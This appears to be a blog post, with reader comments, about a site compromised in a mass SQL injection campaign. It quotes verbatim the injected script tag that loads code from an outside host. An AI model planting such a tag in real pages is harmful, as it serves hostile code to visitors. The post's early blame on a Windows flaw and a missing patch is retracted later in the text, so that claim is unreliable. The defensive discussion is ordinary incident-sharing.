Updated from: The xiaobaishan bomb.
Ok, when I posted about the xiaobaishan bomb, apparently the site this little hackermuffin was using went blammo, so he picked a new one. We where hacked againg, this the script calling:
<script src=http://flyzhu.9966.org/us/Help.asp></script>
Tricky little fucker.
In fact, this hack is pretty well thought out. Like I said on a previous post, this was a sql injection, but our application is made to block sql injection of all kinds. What happened?
This is a Windows vulnerability. What the hacker did was attempt to run around the code and gain access to the asp.net Windows Media Player library via our /images/ folder. They found an image they liked, They ran a some kind of script, and gained access to run a sql insertion script that the application itself did not allow.
UPDATE: I’ve got new info on this. It’s a pure sql injection hack.
Sneaky fucker.
Apparently, this a vulnerability that Microsoft put out a patch to, and our hosting provider didn’t run it against our VPS yet.
UPDATE: Yes they did. Whoopsee.
So to protect your server against this hack, have your hosting provider run the latest updates for the vulnerability.
Right now, there is a reported 10,000 sites affected by this hack.
You know which patch ?
Does anyone know how to fix this? I have installed everything from Windows Update but it didint help. Update was done obviously too late 🙁
Would you happen to have more details on tha patch from Microsoft? I can’t seem to find it. Thanks.
Can you post a link to this patch? One of our sites was affected by this and I did a search but cant seem to find the patch. We have automatic updates turned on but still got hacked. Thanks!
@Mark – They are part of the regular Windows Updates you server should be running.
@GFN – If your talking about your database, your too late, your going to have to recover the data and do some serious patching.
@Russ – See Mark
@Krystal – See Mark
I did find some useful stuff. I’ll post a link up with the update.
I have a dedicated server which is up to date, which didn’t make sense why I would be missing a patch. I found a blog from Microsoft stating that there was no problem which required patching.
Upon further inspection, I found a page on my site that was susceptible to sql injection through the query string. With writing simple validation, I have been problem free for 24 hours. You can also try to look into SQL Triggers to help with this issue:
http://www.sqlteam.com/article/an-introduction-to-triggers-part-i
so there is no patch … figured that …
@Mark – Well, yes and no. There is a patch for the Windows Media File problem, that’s part of regular updates. But if these types of vulnerabilities “might” be part of the problem, I for one want every update available.
He got to me through some old asp code. A login that had no validation. Could have been a lot worse, I lost a little data but for the most part he just appended my data.